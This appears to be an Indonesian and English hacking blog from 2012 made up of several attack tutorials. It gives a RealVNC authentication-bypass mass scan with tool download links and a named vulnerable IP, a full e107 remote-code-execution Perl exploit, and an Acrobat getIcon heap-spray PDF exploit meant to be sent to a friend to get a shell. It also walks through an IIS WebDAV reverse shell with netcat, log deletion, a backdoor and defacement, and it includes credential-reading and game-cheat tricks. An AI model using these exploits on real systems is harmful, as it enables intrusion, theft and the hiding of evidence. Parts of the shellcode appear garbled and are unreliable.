Tuesday, January 10, 2012

VNC Viewer Authentication Bypass Hacking

VNC Viewer Authentication Bypass Hacking Database Servers
This Basic tutorial will teach you how to hack real VNC server databases.
some servers have mysql database and important information like Credit Card INFORMATION.
so it will depend on what ip range or what server are you scanning and what kind of server is running.
you can hack linux servers, sunos servers, mac os servers,xp servers etc. as long as they are vulnerable to
VNC AUthentication Bypass and using REAL VNC so this software will only bypass the real vnc software its like
Remote desktop in there servers.
The things you need here is:
1. RealVNC <= 4.1.1 Bypass Authentication Scanner
2. VNC Viewer Authentication Bypass
3. Linux uid shell or rootshell
=========Linkz==========
any of these tools will not held me resposible for any damages or action to the servers that
you have hack its your own free will.if you want to download it or not its your choice. or you
can try to find or search tools like this in the net.i just got this tools from some servers too.
im just sharing informations :)
(RealVNC <= 4.1.1 Bypass Authentication Scanner) for linux shell only
http://upsstoreflorida.com/images/VNCscan
(VNC Viewer Authentication Bypass link) windows base software
http://upsstoreflorida.com/images/vncviewer-authbypass.zip
(Linux uid shell or rootshell)
Go Find your own shell to use
so after you have gathered the tools you needed LETS START!first login to you shell
then try to scan for vulnerable vnc servers by using the (RealVNC <= 4.1.1 Bypass Authentication Scanner).
after scanning the output of your scan will go to VNC_bypauth.txt. all you need to do is cat VNC_bypauth.txt.
then it will show the vnc servers you have scan if vulnerable or patch or banned so just get the VULNERABLE IPS
then use the ip put it in the (VNC Viewer Authentication Bypass link) server box and just click OK.it will try to
bypass auth the real vnc server if successfull you will be able to get in there desktop or server.
this will be the process command output on the shell.
===SHELL EXAMPLE==
-sh-3.2$ wget http://upsstoreflorida.com/images/VNCscan
–09:47:54–  http://upsstoreflorida.com/images/VNCscan
=> `VNCscan’
æ­£å¨æ¥æ¾ä¸»æ© upsstoreflorida.com… 216.251.43.17
æ­£å¨é£æ¥ upsstoreflorida.com|216.251.43.17|:80… é£ä¸äºã
å·²éåº HTTP è¦æ±ï¼æ­£å¨ç­ååæ… 200 OK
é·åº¦: 42,895 (42K) [text/html]
100%[====================================>] 42,895        34.24K/s
09:47:58 (34.16 KB/s) — å·²å
²å­ âVNCscanâ [42895/42895])
-sh-3.2$ ls -al
ç¸½è¨ 124
drwxr-xr-x 2 sally users  4096 2009-07-08 09:47 .
drwxr-xr-x 6 sally users  4096 2009-06-13 22:41 ..
-rwxr-xr-x 1 sally users 42895 2009-04-25 19:37 v
-rw-r–r– 1 sally users 27730 2009-07-08 10:24 VNC_bypauth.txt
-rwxr-xr-x 1 sally users 42895 2009-05-07 16:05 VNCscan
-sh-3.2$ ./VNCscan   符æ¬éç ä½
-sh-3.2$ chmod +x VNCscan   æ
-sh-3.2$ ./VNCscan
================================================[rev-0.0.1]==
========RealVNC <= 4.1.1 Bypass Authentication Scanner=======
============multi-threaded for Linux and Windows=============
====================================================[linux]==
MAIN MENU
=============================================================
[+] Usage: VNC_bypauth <target> <scantype> <option>
[-] <target>:
___________________
|___-p____|___-i____|
[-] <scantype>:
____________________
|___-cT___|___-vnc___|
[-] <option>:
________________________________________________________
|___-v____|___-vv____|___-T___|__-tc___|__-tr___|__-tt___|
[+] Type VNC_bypauth <target>,<scantype> or <option> for more informations
[+] To increase the speed under linux, try ulimit -s unlimited
-sh-3.2$ ./VNCscan -p 5900 -i 63.89.1.1-63.250.1.255 -vnc -vv
================================================[rev-0.0.1]==
========RealVNC <= 4.1.1 Bypass Authentication Scanner=======
============multi-threaded for Linux and Windows=============
====================================================[linux]==
FOUND  PORT   IP     STATUS  THREADS TOTAL/REMAINING
63.89.76.144   :5900     vnc4:VULNERABLE
63.89.62.88   :5900     vnc4:banned
63.89.109.240 :5900     vnc4:patched
63.89.139.200 :5900     vnc4:patched
63.89.139.201 :5900     vnc4:patched
63.89.139.210 :5900     vnc4:patched
63.89.139.240 :5900     vnc4:patched
63.89.139.239 :5900     vnc4:patched
63.89.139.250 :5900     vnc4:patched
63.89.139.202 :5900     vnc4:patched
63.89.157.9   :5900     vnc4:banned
F:0      P:53584  I:53584  S:8  %    TH:86      0:00:21/0:03:51
here is the pictures of the
RealVNC <= 4.1.1 Bypass Authentication Scanner
[img src="http://upsstoreflorida.com/images/vncscanner.JPG"]
VNC Viewer Authentication Bypass
[img src="http://upsstoreflorida.com/images/vncauthbypass.JPG"]
HACK SERVER Sample from VNC Viewer Authentication Bypass
[img src="http://upsstoreflorida.com/images/vncserver.JPG"]
TRY THIS VULNERABLE SERVER BY USING THE VNC Viewer Authentication Bypass SERVER : 63.230.75.203
Here you go enjoy.
»»  READMORE...

e107 Remote Code Execution + Scanner

Hallo Semua, Kembali Lagi Dengan Mencari Target Shell. Banyak Yang Minta Target Di Channel, Tapi So Far It’s OK lah :) Yuk nyari target dengan e107 bug dork. Jangan lupa install perl di komputer anda / server anda / shell anda (PENTING). Berikut ini adalah Exploitnya, copy dan simpan di file bernama: “e107-binushacker.pl# Exploit Title: e107 Code Exec
# Date: 05/22/10
# Author: McFly@e107.org
# Software Link: http://e107.org/edownload.php
# Version: e107 <= 0.7.20
# Tested on: Linux/Windows

#!/usr/bin/perl -w
#################################################
# e107 Code Exec // SploitAuthor: McFly@e107.org
#################################################
# These scrubs still haven't released an update!
# Here is a little bit of motivation for them to
# patch one of the most popular, and insecure of
# the PHP web apps available today.
#################################################
# DORK: inurl:e107_plugins
#################################################

use LWP::UserAgent;

my $path = $ARGV[0] or die("Gunakan Perintah: perl e107-binushacker.pl http://e107site/pathto/contact.php\n");
my $load = 'passthru(chr(105).chr(100))'; # Simple 'id' command. Put ur PHP payload here!

# Remove comment for proxy support
my $proxy = 'http://127.0.0.1:8118/';
$ENV{http_proxy} = $proxy ? $proxy: 0;

$ua = new LWP::UserAgent;
$ua->agent("Mozilla/5.0");

if ( $proxy )
{
print "[*] Using proxy $proxy \n";
$ua->env_proxy('1');
}

my $req = new HTTP::Request POST => $path;
$req->content_type('application/x-www-form-urlencoded');
$req->content("send-contactus=1&author_name=%5Bphp%5D$load%3Bdie%28%29%3B%5B%2Fphp%5D");

my $res = $ua->request($req);
my $data = $res->as_string;

if ( $data =~ /<td class=["']main_section['"]>(.*)/ )
{
$data = $1;
print "$data\n";
}
else
{
print "$data\n";
}
Setelah code tersebut dibuat, maka jalankan di directory active run perl shell / command prompt anda dengan dengan perintah: perl e107-binushacker.pl http://www.targetanda.com/pathnya/contact.php
Adapun Cara Lain Manual Bisa Dilihat (Video) Berikut:
Lihat Videonya Disini: HERE
Download it: HERE
Cara Lebih Mudah Lagi Dengan Menjalankan BOT SCANNER: Silakan Kunjungi #BINUSHACKER di IRC.DAL.NET untuk lebih detailnya & Tanyakan Langsung Ke Staff Yang Sedang Online.
Source Instant Download Bot Scanner: http://www.shantykooroostvaarders.nl/includes/js/tabs/bnshckr/
Selamat menikmati & semoga berhasil :)
»»  READMORE...

Crack Folder Lock

View Of Folder Lock v5.6.3
Tadi gw dapet panggilan masuk dari seorang sahabat, setelah basa-basi dia nanya kabar ini dan itu ternyata intinya cuma satu, dia minta tolong cariin software pembobol Folder Lock buat buka data skripsinya yg udah dia Lock pake folder lock, soalnya dia lupa passwordnya.  gw jadi teringat tutorial jebol folder Lock yg pernah gw simpan di notebook gw. Sekalian Iseng2 berbagi ama temen2 di binushacker yg belum tau teknik ini, jadi mohon maaf klo postingan ini terlihat basi… wkwkwkw….(yg udah tau gak usah baca…)
To the POint:
1. Buka folder yg udah di proteksi ama Folder Lock dan coba masukin sembarang password
2. Biarin Folder Lock menunggu, buka regedit “hkey_local _machinesoftwarefolder lock, “bar code”
3. Ganti nama “bar code” menjadi “bar codet”
4. Sekarang kembali ke Folder Lock dan masukin password terserah apa aja
5. Lalu Klik “ok” dan mudah mudahan Folder Lock sudah bisa di Akses.
Semoga Bermanfaat, setidaknya sebagai bahan pengingat ilmu2 kita yg udah hilang….
Bravo Indonesian.
»»  READMORE...

Acrobat Reader Exploit (Get Icon)

Asal mula celah keamanan get_icon pada Adobe Acrobat dan pembuat aslinya :
Affected Version : Acrobat Reader 8.1.2 – 9.0
Vendor Patch : http://www.adobe.com/support/security/bulletins/apsb09-04.html
Tested On : XP SP2 / SP3
from ZDI : http://www.zerodayinitiative.com/advisories/ZDI-09-014/
This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Adobe Acrobat and Adobe Reader. User interaction is required in that a user must visit a malicious web site or open a malicious file.The specific flaw exists when processing malicious JavaScript contained in a PDF document. When supplying a specially crafted argument to the getIcon() method of a Collab object, proper bounds checking is not performed resulting in a stack overflow.
If successfully exploited full control of the affected machine running under the credentials of the currently logged in user can be achieved.
This vulnerability was discovered by:
Tenable Network Security (there is a man named Nicolas Pouvesle and we know == > he has lots of exploitation method ; ))
Exploit By : www.Abysssec.com
Tutorial ini berbeda dengan salah seorang yang memberitahukan ke penulis tentang adanya exploit Arcobat Reader get_icon exploit yang sudah dalam bentuk jadi, waktu itu ditunjukkan di urlnya k*****s yang kemudian setelah itu saya modifikasi lalu kemudian saya seminarkan pada tahun 2009 bersamaan dengan teknik-teknik hacking lainnya. Karena sesuatu hal jika saya share lagi “scriptnya” dimungkinkan dia keberatan walaupun sudah saya modifikasi. Maka disini saya menggunakan teknik dari saya sendiri.
Teknik ini saya gabungkan dari shellcode exploit IE7 yang didapat milw0rm (www.milw0rm.com) dengan salah satu teknik yang dipakai abhilyall (www.hackforums.net). Dan tidak ada comotan script yang bersangkutan yang saya masukkan script ini. Jadi yang mau pakai silah-silahkan saja, bebas kok.
Pertama : anda Copy aja saja source code ini lalu pastekan ke notepad.
—————————- potong disini ——————————–
function spary(){
var shellcode = unescape(“%uc931%ue983%ud9a2%ud9ee%u2474%u5bf4%u7381%u5b13%ueec2%u83f8%ufceb%uf4e2%ud2b0%u ? b2b4%u0b68%u4188%uc367%ucc6e%u5b51%u020c%uc7b0%u1306%u3da4%u8811%u5b17%u6177%u3f ? 98%u51d6%u5bc2%uea77%u5782%u11fc%uf6de%u21fc%ud0ca%ueaaf%u67b1%u15fc%u23dc%u9274 ? %u2549%u6257%ud039%u7539%ub6f1%u3621%ud093%u6248%ud039%u0b85%u02cc%uc784%u53b6%u ? 3e2e%u9c41%u2473%ub220%u3e2e%ud09c%ueaba%u7f84%ua274%uba13%ua074%u92f1%uea11%ud0 ? ca%u7d31%u98c1%u80b6%u58c0%ueab6%u58c2%ueab4%ud038%ue280%u5504%ub1fc%u5fa8%u892e ? %u5b92%u6177%u9d41%u337a%ua494%u9d20%ud098%u0baf%u02c3%u5c9f%u5bc2%ue277%u4804%u ? 2721%u6542%u14f7%udb38%ue141%ud89c%u419b%u8749%u411d%ua491%u8d20%u5f05%u3d74%u75 ? a3%ua612%u5886%u1973%u5ba7%u5277%u0b02%u3227%u0b94%u3688%ud03e%u31ab%ua491%u9120 ? %ua492%u9520%u9bf1%ue4db%u2e02%u308e%u0d90%u9e24%u0110%uca2e%ub520%ua144%ub301%u ? 9e51%ua43d%u0430%u0bb6%u0e05%u1aa1%u0513%u3eb0%u1204%u1cc2%u1512%u2291%u1504%u36 ? a7%u0833%u3eb0%u1514%u29ad%u200e%u0cc2%u0f1e%u2387%u0212%u1ec2%u080f%u0fb6%u131f ? %u3aa7%u6113%u348e%u0516%u328e%u1315%u29a3%u200e%u2ec2%u0d05%u34af%u6119%u0997%u ? 253b%u2cad%u0d19%u3aad%u3513%u1dad%u0d1e%u1aa7%u9077%ub62f%uc29e%ued74%u8d85%ua3 ? 36%u8b9c%uac34%ud687%uab28%u9d9a%uae28%u9c8b%ua175%u9581%ua074%u9dc0%ua723%uf86e ?”);
garbage = unescape(“%ud9db%u74d9%uf424%uc929%u51b1%u02bf%u6c21%u588e%u7831%u8317%u04c0%u7a03%u8e32%u867b%ua55e%u9ec9%uc666%ua12d%ub2f9%u79be%u4fde%ubd7b%u2c95%uc581%u23a8%u7a02%u30b3%ua44a%uadc2%u2f3c%ubaf0%uc1be%u7cc8%ub159%ubdaf%uce2e%uf76e%ud1c2%ue3b2%uea29%ud066%u79f9%u9362%ua5a5%u4f6d%u2e3f%uc461%u6f4b%udb66%u8ca0%u50ba%ufebf%u7ae6%u3da1%u59d7%u4a45%u6e5b%u0c0d%u0550%u9061%u92c5%ua0c2%ucd4b%ufe4c%ue17d%u0101%u9f57%u9bf2%u5330%u0bc7%ue0b6%u9415%uf86c%u428a%ueb46%ua9d7%u0b08%u92f1%u1621%uad98%ud1df%uf867%ue075%ud298%u3de2%u276f%uea5f%u118f%u46f3%uce23%u2ba7%ub390%u5314%u55c6%ubef3%uff9b%u4850%u6a82%uee3e%ue45f%ub978%ud2a0%u56ed%u8f0e%u860e%u8bd8%u095c%u84f0%u8061%u7f51%ufd61%u9a3e%u78d4%u33f7%u5218%uef58%u0eb2%udfa6%ud9a8%ua6bf%u6008%ua717%uc643%u8768%u830a%u41f2%u30bb%u0496%uddde%u4f38%uee08%u8830%uaa20%ub4cb%uf284%u923f%ub019%u1c92%u19a7%u6d7e%u5a52%uc62b%uf208%ue659%u15fc%u6361%ue547%ud04b%u4b10%ub725%u01cf%u66c4%u80a1%u7797%u4391%u5eb5%u5a17%u9f96%u08ce%ua0e6%u33d8%ud5c8%u3070%u2d6a%u371a%uffbb%u171c%u0f2c%u9c68%ubcf2%u4b92%u92f3″) + shellcode;
nopblock = unescape(“%u9090%u9090″);
headersize = 10;
acl = headersize+garbage.length;
while (nopblock.length fillblock = nopblock.substring(0, acl);
block = nopblock.substring(0, nopblock.length-acl);
while(block.length+acl<0×40000) block = block+block+fillblock;
memory = new Array();
for (i=0;i<180;i++) memory[i] = block + garbage;
var buffersize = 4012;
var buffer = Array(buffersize);
for (i=0; i
{
buffer[i] = unescape(“%0a%0a%0a%0a”);
}
Collab.getIcon(buffer+’_N.bundle’);
}
spary();
————— potong disini ———————–
Lalu simpan dengan nama file hackpdf.txt
Seperti ini dibawah ini :

Lalu Download Python : http://www.python.org/ftp/python/2.6.1/python-2.6.1.msi lalu install setelah maka download http://www.didierstevens.com/files/software/make-pdf_V0_1_1.zip lalu extract ke c:\python26
Di directory c:\python ketik :
c:\python26>make-pdf-javascript.py -f hackpdf.txt hackpdf.pdf

Setelah menjadi file PDF silahkan upload ke web anda suruh teman anda buka dengan Acrobat Reader 8.1.2 – 9.0 lalu anda masuk ke Putty ( http://www.chiark.greenend.org.uk/~sgtatham/putty/download.html )
Masukkan ip addreas teman anda dalam putty lalu pilih telnet lalu masukkan port 5500 lalu jalankan.
Hasilnya anda akan mendapatkan shell :.

Exploit seperti ini terdeteksi oleh Antivirus, pastikan antivirus gak aktif.
Sebagai tambahan bagi yang pernah mendapatkan script yang fungsinya seperti ini yang di dapat dari saya jaman dahulu maka anda dapat menghapusnya dari komputer anda, daripada nanti menimbulkan masalah ke anda, karena saya sudah menghapus script dari yang bersangkutan dari komputer saya. Sebagai gantinya anda dapat menggunakan teknik dan script ini.
Sehingga jika saya mengisi seminar atau di event saya sudah tidak menggunakan script yang isunya katanya milik yang bersangkutan, tapi saya menggunakan teknik cara berbeda yang saya tulis diatas dengan sumber yang sudah disebutkan.
Bagi yang lain jika ingin mengisi seminar, workshop atau lainnya boleh saja menggunakan tutorial dan script ini karena sudah saya licensikan ke YFX. :)
Bagi yang ingin mendownload paket lengkapnya :
http://rapidshare.com/files/405002909/hackpdf.zip tapi hanya bisa di download sebanyak 10x, sehingga share kembali setelah anda mendapatkannya.
Script seperti ini sudah ada juga di Metasploit Framework 3.4, jadi dapat menjadi alternatif selain menggunakan ini.
»»  READMORE...

Hacking Dengan IIS

1) Pendahuluan
Pertama-tama sebelum melakukan, biar saya jelaskan kepada anda bahwa hacking atau deface menggunakan suatu exploit yang sudah ada di internet hanya akan menjadikan anda seorang lamer atau perusak. Anda seringkali mendapati orang-orang ini melakukan deface terhadap ratusan situs. Nah, mereka ini bukanlah hacker, melainkan script kiddies, karena mereka menggunakan code yang dibuat orang lain untuk mendeface situs. Hacker yang sejati adalah orang yang menciptakan code exploit dalam ‘0 day’. Dan saya sarankan kepada anda agar JANGAN PERNAH MENJADI SCRIPT KIDDIES untuk memperoleh sedikit ketenaran dan merasa bangga dengan hal tersebut!!!
2) Adanya Celah Keamanan
Ok cukup sudah !! Mari dimulai. Pertamakali tujuan kita untuk melakukan penetrasi adalah menemukan suatu hole. Webserver IIS berisikan banyak celah keamanan yang jika dieksploitasi dengan sesuai dapat memberikan seorang hacker kendali penuh atas sistem tersebut. Celah keamanan yang umum adalah buffer overflow, yakni mengeksploitasi format string. Apakah “Buffer Overflow” itu adalah soal yang lain dan memerlukan artikel tersendiri. Atau lebih baik silakan anda baca terbitan Phrack 49 (www.phrack.com) dengan judul “Smashing The Stack For Fun and Profit”. Disana istilah buffer overflow dijelaskan berdasarkan sudut pandang Linux.
Ok, karena webserver IIS menyimpan banyak celah keamanan eksploitasi buffer overflow. Hanya dalam 2 tahun terakhir ini e-eye digital defence team (http://www.eeye.com/) melaporkan adanya buffer overflow pada seluruh ekstensi ISAPI pada IIS Webserver.
Sebagai contoh suatu request http://www.iissite.com/a.idq?aaaaaaaaaaaaaaaaaa….aaaa<shell_code_anda>
Sekarang, kapanpun webserver iis mendapatkan request berupa file seperti .idq atau .asp dsb selain .html request dipenuhi oleh file .dll yang spesifik pada webserver. Namun jika seorang hacker mengirimkan request berupa string panjang dari aaa dan mencari angka yang tepat dimana suatu buffer overflow terjadi, maka dia dapat menyesuaikan shell code ditempat tersebut dan menyebabkan shell codenya dieksekusi pada remote machine.
Catatan: Suatu shell code merupakan kode assembly yang memberikan command prompt pada Win 2000 dan shell jika pada Linux.
Tapi saat pertanyaan diajukan mengenai hacking website, kita memerlukan penemuan bug sebelumnya. Kaerna kebanyakan server yang dipatch untuk bug yang ditemukan sebelumnya. Pada dasarnya bug .idq ditemukan dua tahun terakhir tidak akan bekerja hari ini karena kebanyakan server Win 2000 telah dipatch dengan service pack sp3, sp4. Jadi saat ini yang kita perlukan adalah bug terakhir atau dalam dunia perhackingan dinamakan dengan “0day exploit”. Tempat terbaik untuk mencari exploit adalah www.packetstormsecurity.nl, situs ini secara konsisten memuat exploit, code, advisory yang terbaru. Tempat lainnya seperti www.k-otic.com/exploit atau cara terbaik adalah mencari dibagian 0day exploit pada situs kami www.hackersprogrammers.com. Sekarang ini sangat banyak 0day yang sengaja tidak pernah dipublikasikan!!! Dan hanya ditujukan untuk komunitas underground atau orang-orang tertentu yang dikenal sebagai hacker. Untuk mendapatkan exploit yang baik, anda perlu mengadakan kontak dengan hacker yang baik dan berbakat di internet. Dan pilihan terbaik adalah code yang anda buat sendiri (jika anda mampu) maka dengan ini anda mampu menghack berbagai webserver IIS di seluruh dunia!!! J
3) Mengeksploitasi celah keamanan dan Mengendalikan webserver
Ini bagian yang paling menarik. Compile code exploit anda dengan Visual C++ jika berupa kode win c atau gunakan gcc jika berupa kode linux. Jika anda tidak mengetahui hal ini, lebih baik mendownload exploit berbasis GUI dari internet (ini semakin menunjukkan bahwa anda seorang lamer). OK, sekarang sebagai contoh exploit webdave ntdll.dll yang ditemukan 3-4 bulan terakhir. Masih banyaknya server yang vulnerable untuk ini. Terakhir saat salya menuliskan artikel ini ditemukan bug terbaru berupa RPC DCOM oleh LSD. Namun bug RPC DCOM tidak akan bekerja dalam kasus ini karena firewall pada server akan memblok seluruh packet terhadap port 135. Setelah anda melihat-lihat webdave exploit, downloadlah exploit Kralor Webdave. Compile dan download exploit kralor yang berbasis GUI. Shellcode ini berupa jenis yang spesifik. Shellcode yang digunakan  exploit Kralor memberikan suatu reverse shell. Artinya setelah berhasil mengeksploitasi server tersebut akan terhubung ke computer anda melalui suatu command shell!!! Jadi anda memerlukan netcat listener untuk ‘mendengar’ port spesifik pada computer anda. Download tool netcat dari internet dan masuk ke DOS prompt, ketik sebagai berikut:
D:\nc>nc -Lvp 6666
Listening on [any] 6666 ….
Well, sekarang computer beraksi sebagai suatu server di port 6666 dan listening terhadap berbagai incoming request. Sekarang compile exploit kralor atau gunakan yang berbasis GUI, kemudian masuk ke DOS prompt dan ketik.
D:\vcproject\webdave\debug>web.exe
[Crpt] ntdll.dll exploit trough WebDAV by kralor [Crpt]
www.coromputer.net && undernet #coromputer
syntax: D:\WEB.EXE <host_target> <host_anda> <port_anda> [padding]
Cool !!!  Jadi apa yang harus anda lakukan? Masih bingung? OK, saya sarankan, jika anda ingin menghack suatu server, carilah ip dengan melakukan ping dari DOS. Misalkan ip 123.123.123.123 dan ip kita 200.200.200.200. Pastikan netcat menjalankan beberapa port seperti 6666 dan ketik perintah pada Dos Prompt yang baru:
D:\vcproject\webdave\debug>web.exe  123.123.123.123  200.200.200.200  6666
Terdapat padding bit yang berbeda. Dalam kasus exploit berbasis GUI dapat melakukannya sendiri, atau membaca kometar dalam exploit tersebut untuk mendapatkan suatu ide mengenai apa padding bit tersebut dan bagaimana cara menggunakannya. Setelah berhasil mengeksploitasi anda akan mendapatkan shell pada netcat listener anda.
D:\nc>nc -Lvp 6666
Listening on [any] 6666 ….
connect to 200.200.200.200 from 123.123.123.123
Microsoft(R) Windows 2000
(C)Copyright Microsoft Corp 1981-2000.
C:\winnt\system32>
Selamat!! Jadi anda berhasil mengeksploitasi bug ntdll.dll pada remote server. Command prompt telah kita dapatkan pada netcat listener yang merupakan command prompt pada remote server.
4) Apa yang harus dilakuklansetelah melakukan hacking suatu server?
Pertama kali yang terpenting yang harus dilakukan setelah melakukan hacking berbagai server di dunia internet adalah menghapus log tersebut. Setelah kita memiliki HTTP Port 80 untuk menghack, kita perlu menghapus log IIS. Direktorinya dalam hal ini ada di C:\winnt\system32\logfiles . Jadi pada shell tersebut anda tinggal mengetik.
C:\winnt\system32> rmdir /s /q logfiles
Yang menghapus direktori log file, file dan folder yang terdapat dalam direktori tersebut.
Catatan: Ini merupakan cara yang buruk dalam menghapus file log. Admin dapat langsung mengetahui bahwa seseorang telah menghacking servernya. Cara lain yang terbaik adalah masuk kedalam direktori logfile dan cari file log yang spesifik dan menghapus hanya pada baris ayng berisikan ip anda.
Sekarang, setelah megnhapus log file. Anda dapat bermain-main dengan server tersebut. Seluruh server berada dalam kendali anda. Hal terbaik adalah menginstall suatu backdoor pada server tersebut. Membua backdoor senfiri atau sebagai gantinya mengupload netcat apda server tersebut dan menjadinnya listen pada beberapa port yang spesifik dan anda juga dapat menambahkan entri dalam registri jadi dapat tetap dalam keadaan listening bahkan setelah server tersebut direstart.
Langkah berikutnya, misalkan anda ingin mendeface situs tersebut, maka carilah direktori webrootnya. Direktori default biasanya adalah  C:\inetpub\wwwroot, disana anda akan menemukan file seperti index.html, index.asp, default.html dan file-file lain seperti itu. Jika ada, maka anda sudah berada pada direktori yang dimaksud. Sekarang tinggal membackup file index.html nya. Perintahnya adalah sebagai berikut:
C:\inetpub\wwwroot> copy index.html indexold.html
C:\inetpub\wwwroot> echo defaced by Chintan Trivedi > index.html
Wah !! Akhirnya anda berhasil mendeface situs tersebut. Jika anda ingin mengupload file anda sendiri ke server tersebut, maka anda harus memiliki TFTP server pada sistem anda. Jalankan dan ketik ketik perintah remote shell berikut:
C:\inetpub\wwwroot> tftp 200.200.200.200 GET index.html
Perintah ini akan mengupload file index.html anda ke web server. Oh ya, contoh diatas dengan anggapan 200.200.200.200 menjadi ip anda. Dan ingatlah mengenai satu hal penting. Webdave exploit dapat menyebabkan crash pada server IIS. Jadi situs tidak akan terbuka dan anda tidak dapat melihat halaman yang terdeface L Jangan khawatir, ada cara untuk merestart IIS pada remote system tersebut, yaitu:
C:\inetpub\wwwroot> iisreset /restart /rebootonerror /timeout:100
Tunggulah sebentar dan bukalah situs tersebut, misalnya www.target.com dan lihat halaman yang telah anda deface!!! Nah ini semua hanyalah satu contoh hacking webserver menggunakan webdave exploit. Terus memperbarui sesi 0day anda di www.hackersprogrammers.com dengan 0day exploit terbaru. Setiap exploit bekerja dengan caranya masing-masing. Anda dapat melihat penjelasan yang tersedia pada exploit tersebut jika anda bukan seorang script kiddie.
5) Kesimpulan
Hal yang perlu saya katakan kepada anda bahwa hacking atau mendeface melalui exploit ‘siap-pakai’ yang tersedia di internet adalah tindakan merusak. Janganlah dilakukan terus menerus. Melakukan hacking suatu server hanya jika anda memang memiliki alasan kuat untuk melakukannya dan anda benar-benar mengetahui apa yang sedang anda lakukan. Jika anda melakukan hacking secara membabi-buta anda hanya akan menyebabkan berbagai kerusakan, kebencian dan tidak memahami bagaimana dunia ini bekerja.
Dan untuk admin: jika anda ingin melindungi server anda dari hacker, maka langkah terbaik adalah tetap mengupdate dengan service pack terakhir yang disediakan oleh Microsoft. Kedua, kapanpun server anda dihack atau terdeface, silakan periksa pada sistem anda, apakah telah terinstall backdoor, rootkit. Kalau ada, hapuslah. Ketiga menjaga direktori file log dari seseorang yang tidak berhak. IIS menyediakan fasilitas untuk mengubah direktori file log. Tapi dalam berbagai kasus, tetap saja pencegahan jauh lebih baik daripada penyembuhan.
»»  READMORE...

Stealing Password IM2 Broom

Hmm … Pada dasarnya tulisan ini hanyalah untuk Pengetahuan & Pembelajaran semata dan ini adalah tulisan kedua saya disini ( artikel.xcode.or.id ), jikalau kalian belum sempat membaca tulisan pertama saya ada baiknya kalian mereview-nya Disini ( Promosi MODE ON ) he 4x
Mungkin ini adalah berita baik untuk kalian para pengguna Account dari Provider Im2 Broom Dengan MODEM HUAWEI E200 agar Account anda tersebut tidak di Hack oleh orang2 yang tidak bertanggung jawab, karena pada tulisan ini saya akan menulis betapa mudahnya melihat Account & Password Im2 Broom dengan Modem Hwawei E220 ( SOMBONG MODE ON ) he 4x
Anda bisa bayangkan apabila anda pengguna Account dari Provider IM2 Broom pada Laptop / notebook / netbook / pc anda, lalu ada salah seorang rekan anda memakai / meminjamnya lalu rekan anda tsb mencuri account anda dan memakainya, apakah tindakan anda selanjutnya ??? apakah membuka nomer baru / account baru ??? he 4x, andapun bisa bayangkan berapa banyak kerugian yang anda dapatkan ( KASIAN DEH LHO ) he 4x???
Karena disini saya berbaik hati, maka dari itu saya akan memberikan Tips & Trik cara pencegahannya sekaligus membuktikannya kepada anda bahwa betapa mudahnya untuk melihat Account & Password anda tersebut pada  Laptop / notebook / netbook / pc anda. Anda bisa bayangkan apabila anda pengguna Account dari Provider IM2 Broom pada Laptop / notebook / netbook / pc anda, lalu ada salah seorang rekan anda memakai / meminjamnya lalu rekan anda tsb mencuri account anda dan memakainya, apakah tindakan anda selanjutnya ??? apakah membuka nomer baru / account baru ??? he 4x, andapun bisa bayangkan berapa banyak kerugian yang anda dapatkan ( KASIAN DEH LHO ) he 4x???,
Kebetulan disini sayapun menggunakan modem Huawei E200 dengan kartu Im2 Broom, maka dari itu saya akan menerapkannya untuk para pengguna Account Im2 Broom dengan Modem Huawei E220 he 4x, dan untuk account dan modem lain2nya, saya akan menulisnya di kemudian hari ( he 4x ) Pegel Euy Ngetik sekaligus banyak materi ( PEMALAS MODE ON ) maka dari itu Bertahap he 4x  , Ok ^_^
Langsung saja, pertama-tama saya akan menunjukan betapa mudahnya untuk melihat password dari Account Im2 Broom anda pada Modem Hwawei E220 …
Oke D.J CEKIDOT ….
Pertama – tama kalian harus mengetahui dimana letak direktori Modem Hwawei kalian di Install, Apakah di Localdisk C / D / E ?? Pada dasarnya si di C:\
Lengkapnya si di C:\Program Files\Huawei technologies\Mobile Connect

Pada dasarnya pada saat kita menginstall modem tersebut sesuai dengan Standar installasi, maka direktorinya seperti di gambar atas ( SAMA SEPERTI SAYA ).
Selanjutnya adalah untuk mengetahui Account & password, tinggal buka direktori :
C:\Program Files\Huawei technologies\Mobile Connect\scheme.cfg

Selanjutnya buka file scheme.cfg dengan text editor

Keterangan :
scheme.cfg adalah tempat penyimpanan / konfigurasi modem anda.
User = ( User name yang tersimpan pada konfigurasi file scheme.cfg )
Password = ( Password yang tersimpan pada konfigurasi file scheme.cfg )
Jadi bisa kita bayangkan apabila account anda jatuh ketangan orang lain dengan metode pada tulisan ini dan ditambah dengan metode yang ada di tulisan saya yang sebelumnya disini, maka andapun berinternetan akan tidak nyaman karena koneksi sering terputus karena Account Anda di pakai oleh orang lain , he 4x ( KASIAN DEH LHO )
Nah untuk solusinya sangat mudah. Caranya adalah buka file scheme.cfg , lalu cari baris User = bla bla bla , lalu baris password = bla bla bla , selanjutnya hapuslah bla bla bla tsb.
Keterangan :
Bla bla bla adalah identitas dari account yang anda gunakan.
Mudah bukan ^_^ dengan begitu account andapun akan tetap aman dan andapun bisa berinternetan dengan nyaman tanpa gangguan apapun ^_^
Source: xcode.or.id
Penulis: vrman777
»»  READMORE...

Archive Point Blank Cheat

Berikut adalah kumpulan point blank cheat, pointblank cheat 2011, download point blank cheat, free point blank cheat, cheatsheet pointblank, gratis point blank, update point blank, Point Blank Online Cheat, cheat PB, cheat point blank, cheat pointblank.
Tutorial:
instal vcredits_x86
buka injector
buka PBloncer
kalo injectornya udah gerak ke pojok atas klik hack masmed
trus alt+tab klik nya jngan asal-asalan…
kalo udah kluar notice klik resume…
Untuk beli misi mayor point harus cukup 14000 baru bisa beli misi mayor..

Cheat/Trainer Effect :
[*] MINIMIZE = INSERT [ON]
[*] MINIMIZE = DELETE [OFF]
[*] MAJOR MISSION HACK = END
[*] RESET TITLE = F12
[*] TITLE HACK = HOME
[*] MASMED HACK = NUMPAD 1 – 0
[*] COMPLETE ALL CARD = PAGEUP
[*] UNCOMPLETE ALL CARD = PAGEDOWN
[*] QUICK EXIT PROCESS = PAUSE BREAK
[*] WALLSHOT = F5 [ON]
[*] WALLSHOT = F7 [OFF]
[*] RPG Mode = F9
[*] Allow all weapons = F10
Credit:
Injector: Bayi Kuntilanak
dll: RCD@N3
Cheat/Trainer Effect :
[*] MINIMIZE ON = F9
[*] MINIMIZE OF = F10
[*] HACK TITLE (With title Effect) = F11
[*] HACK MISI MAYOR = F12
[*] MASMED = NUMPAD 1-0
